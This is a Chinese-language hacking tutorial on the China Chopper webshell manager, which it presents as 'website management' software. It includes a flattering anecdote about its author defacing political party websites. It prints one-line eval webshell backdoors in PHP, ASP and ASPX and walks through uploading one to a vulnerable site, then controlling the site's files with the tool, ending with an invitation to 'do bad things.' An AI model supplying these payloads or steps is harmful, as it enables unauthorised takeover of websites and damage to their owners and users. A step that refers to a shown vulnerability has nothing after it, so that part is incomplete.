中国菜刀的由来:
说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。
作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。
主要功能有:文件管理,虚拟终端,数据库管理。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持YSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式连接的数据库。
只要往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。
什么是一句话木马?
一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下:
php:<?php @eval($_post['pass']);?>
asp:<%eval request ("pass")%>
aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
一句话木马的使用
以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。
假设有个智障网站有这样的漏洞:
我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择“添加选项”
编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑” 。
在URL中选中目标网站,点击鼠标右键,选择“文件管理”,就能看到网站的目录结构了 。
获取整个网站的目录,然后就可以开始做坏事了。